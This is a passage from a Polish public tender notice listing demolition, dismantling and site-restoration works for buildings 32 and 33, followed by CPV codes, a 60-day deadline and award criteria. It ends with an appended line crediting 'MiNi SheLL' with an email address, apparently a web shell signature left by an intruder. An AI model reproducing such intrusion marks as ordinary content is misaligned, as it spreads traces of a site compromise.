2.2.16.Montaż wolnostojącego złącza kablowego ZK-1a i podstawy PBD.
2.2.17.Załadunek, wywóz oraz utylizacji gruzu spryzmowanego.
2.3.Budynek nr 32
2.3.1.Rozebranie ścian z cegły powyżej i poniżej terenu.
2.3.2.Rozebranie ścianek działowych z cegieł.
2.3.3.Rozebranie płyt dachowych żelbetowych gr.15cm.
2.3.4.Rozebranie pokrycia dachu z papy.
2.3.5.Rozebranie rur spustowych z blachy ocynkowanej nie nadającej się do użytku.
2.3.6.Rozebranie rynien dachowych z blachy ocynkowanej nie nadającej się do użytku.
2.3.7.Rozebranie obróbek blacharskich oraz parapetów zewnętrznych z blachy ocynkowanej nie nadającej się do użytku.
2.3.8.Wykucie z muru okien stalowych o pow. do 2m2.
2.3.9.Demontaż balustrady wewnętrznej.
2.3.10.Rozebranie betonowych i żelbetowych ław i stóp fundamentowych o grubości do 70cm.
2.3.11.Rozebranie posadzki i podłoża betonowego gr.15cm.
2.3.12.Rozebranie opaski betonowej wokół budynku.
2.3.13.Rozebranie ogrodzenia z siatki w ramkach stalowych na słupkach stalowych.
2.3.14.Rozebranie cokołu betonowego ogrodzenia.
2.3.15.Demontaż grzejników żeliwnych o powierzchni grzejnej do 2,5m2.
2.3.16.Demontaż przewodów centralnego ogrzewania z rur stalowych o średnicy do 25mm.
2.3.17.Demontaż przewodów wodociągowych z rur o średnicy do 50mm.
2.3.18.Demontaż zaworu przelotowego fi 50mm sieci wodociągowej.
2.3.19.Demontaż zbiornika hydroforowego 1500dm3.
2.3.20.Demontaż zbiornika odżelaziacza 1500dm3 w hydroforni.
2.3.21.Demontaż zaworu kołnierzowego fi 80mm w hydroforni.
2.3.22.Demontaż rurociągu stalowego ocynkowanego fi 15-20mm w hydroforni.
2.3.23.Demontaż rurociągu stalowego ocynkowanego fi 50mm w hydroforni.
2.3.24.Demontaż rurociągu stalowego ocynkowanego fi 65-80mm w hydroforni.
2.3.25.Demontaż pompy z silnikiem.
2.3.26.Montaż korka PCV kanalizacyjnego fi 200mm sieci kanalizacyjnej.
2.3.27.Wstawienie korka żeliwnego ciśnieniowego fi 100 sieci wodociągowej.
2.3.28.Demontaż wsporników instalacji uziemniającej i odgromowej na ścianie o podłożu innym niż betonowe.
2.3.29.Demontaż wsporników instalacji uziemniającej i odgromowej na ścianie o podłożu innym niż betonowe.
2.3.30.Demontaż wsporników odstępowych instalacji odgromowej na dachu krytym papą.
2.3.31.Rozebranie przewodów uziemniających i odgromowych mocowanych na wspornikach na ścianie, ciąg poziomy, pręt o przekroju do 120mm2.
2.3.32.Zasypanie wykopu spycharkami.
2.3.33.Zakup i dowóz ziemi do zasypania wykopów, wyrównania terenu i wykonania trawników.
2.3.34.Wykonanie trawników poprzez: rozrzucenie i wyrównanie nawierzchni dowiezionej ziemi, wysiew nasion oraz ubicie nawierzchni trawników.
2.3.35.Demontaż rozdzielni lub skrzynek o wadze do 50kg.
2.3.36.Montaż wolnostojącego złącza kablowego ZK-1a i podstawy PBD.
2.3.37.Załadunek, wywóz oraz utylizacji gruzu spryzmowanego.
2.4.Budynek nr 33
2.4.1.Rozebranie rur spustowych z blachy ocynkowanej nie nadającej się do użytku.
2.4.2.Rozebranie rynien dachowych z blachy ocynkowanej nie nadającej się do użytku.
2.4.3.Demontaż przewodów wodociągowych z rur o średnicy do 25mm.
2.4.4.Rozebranie ścianek działowych z cegieł.
2.4.5.Rozebranie ścian z bloczków komórkowych.
2.4.6.Rozebranie pokrycia dachu z papy.
2.4.7.Rozebranie konstrukcji więźb dachowych.
2.4.8.Rozbiórka podsufitki z płyt.
2.4.9.Rozebranie betonowych i żelbetowych ław i stóp fundamentowych o grubości do 70cm.
2.4.10.Rozebranie posadzek oraz podłoża betonowego gr.15cm.
2.4.11.Rozebranie opaski z płytek betonowych 35x35x5cm na podsypce piaskowej wzdłuż budynku.
2.4.12.Rozebranie chodnika z płytek betonowych 50x50x7cm na podsypce piaskowej.
2.4.13.Mechaniczne rozebranie podbudowy o grubości 12cm nawierzchni dojść i placów.
2.4.14.Rozebranie ogrodzenia z siatki w ramkach stalowych na słupkach stalowych.
2.4.15.Rozebranie cokołu betonowego ogrodzenia.
2.4.16.Rozebranie schodów z kamienia.
2.4.17.Rozebranie obrzeży trawnikowych 6x20cm na podsypce piaskowej.
2.4.18.Demontaż balustrady schodowej zewnętrznej.
2.4.19.Demontaż wsporników instalacji uziemniającej i odgromowej na ścianie o podłożu innym niż betonowe.
2.4.20.Demontaż wsporników odstępowych instalacji odgromowej na dachu drewnianym krytym papą.
2.4.21.Rozebranie przewodów uziemniających i odgromowych mocowanych na wspornikach na ścianie, ciąg poziomy, pręt o przekroju do 120mm2.
2.4.22.Demontaż przewodów kanalizacyjnych z rur żeliwnych o średnicy do 150mm.
2.4.23.Montaż korka PCV kanalizacyjnego fi 200mm sieci kanalizacyjnej.
2.4.24.Wstawienie korka żeliwnego ciśnieniowego fi 100 sieci wodociągowej.
2.4.25.Zasypanie wykopu spycharkami.
2.4.26.Zakup i dowóz ziemi do zasypania wykopów, wyrównania terenu i wykonania trawników.
2.4.27.Wykonanie trawników poprzez: rozrzucenie i wyrównanie nawierzchni dowiezionej ziemi, wysiew nasion oraz ubicie nawierzchni trawników.
2.4.28.Demontaż rozdzielni lub skrzynek o wadze do 20kg.
2.4.29.Montaż wolnostojącego złącza kablowego ZK-2a i podstawy PBD.
2.4.30.Ręczne kopanie rowów dla kabli o szerokości dna do 0,4m i głębokości do 0,8m, kategoria gruntu III.
2.4.31.Układanie ręcznie kabli wielożyłowych układanych w rowach kablowych, kabel do 0,5kg/m, przykrycie kabla folią kalandrowaną z PCW uplastycznionego - YKY 3x4mm2.
2.4.32.Montaż  mufy przelotowej z rury termokurczliwej na kablach energetycznych o izolacji papierowej i powłoce ołowianej, Al do 1 kV, kabel wielożyłowy do 25 mm2.
2.4.33.Ręczne zasypywanie rowów do kabli o szerokości dna wykopu do 0,4m i głębokości 0,8m, kategoria gruntu III.
2.4.34.Montaż automatu zmierzchowego w rozdzielni wolnostojącej.
2.4.35.Załadunek, wywóz oraz utylizacji gruzu spryzmowanego.
Szczegółowy zakres robót ujęty jest w przedmiarze robót i Specyfikacji Technicznej Wykonania i Odbioru Robót. Dokumenty te są zasadniczym źródłem do szacowania kosztów realizacyjnych przez Wykonawcę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.13.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com